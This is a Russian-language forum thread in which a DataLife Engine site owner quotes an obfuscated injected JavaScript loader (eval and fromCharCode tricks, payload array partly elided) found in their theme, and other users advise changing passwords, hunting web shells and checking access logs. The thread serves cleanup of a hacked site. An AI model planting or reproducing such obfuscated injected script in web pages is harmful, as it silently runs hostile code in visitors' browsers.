Вирус на сайте dle

A
На сайте с 25.09.2011
Offline
0
584

Здравствуйте. Был найден вирус в теме сайта <script>b=new function(){return 2;};if(!+b)String.prototype.test='harC';

for(i in $='esrhserh')if(i=='te'+'st')m=$;try{new Object().wehweh();}
catch(q){ss="";}try{window['e'+'v'+'al']('asdas')}catch(q){s=String
["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);
Object.prototype.asd='e';if({}.asd==='e')a=documen t
['c'+'r'+'e'+'a'+'t'+'e'+'T'+'e'+'x'+'t'+'N'+'o'+'d '+'e']('321');
if(a.data==321)t=-1*(d-d2);n=[-t+7,.........-t+123];for(i=0;i<n.length;i++)ss+=s
(eval("n"+"[i"+"]"));eval(ss);</script>

Скрипт удалил, но он периодически появляется. Помогите пожалуйста, где искать взлом?

BralBine
На сайте с 21.07.2011
Offline
73
#1

Как часто появляется данный вирус, после удаления?

Попробовать сменить все пароли, провести анализ FTP на наличие подозрительных файлов.

В админпанели есть раздел: Антивирус

Нажмите на него, сделайте скриншот ajax-окна, и опубликуйте его здесь.

Хортица
На сайте с 22.12.2006
Offline
289
#2
Artemuch:
Помогите пожалуйста, где искать взлом?

Шерше ля shell, что в переводе - ищите шел ;)

На XBit.Money (https://xbit.money/?rid=111) меняю крипту на гривны. Лучшие курсы Обмен Вашего PayPal/ЯД/QIWI/WebMoney и куча плюшек! Рекомендую (https://exchangex.ru/index.php?who=26749)
Rebz
На сайте с 27.01.2009
Offline
58
#3

уберите права на запись в этот файл :)

А вообще в этом разделе есть несколько тем, посвященных взлому dle и лечению.

rebz.net - Профессиональный аудит безопасности сайтов (http://rebz.net) (ОТЗЫВЫ (http://forum.antichat.net/threadnav153966-1-10.html)) Мы надежно защитим Ваш бизнес в интернете.
Z
На сайте с 30.08.2011
Offline
52
#4

1. меняйте пароли от фтп и админки

2. парольте админку

3. меняйте пароль от базы

4. ищите шелы

5. смотрите access_logs кто меняет этот файл и смотрите как.

если псе перечисленное не поможет - меняйте хостинг заражен сервак.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий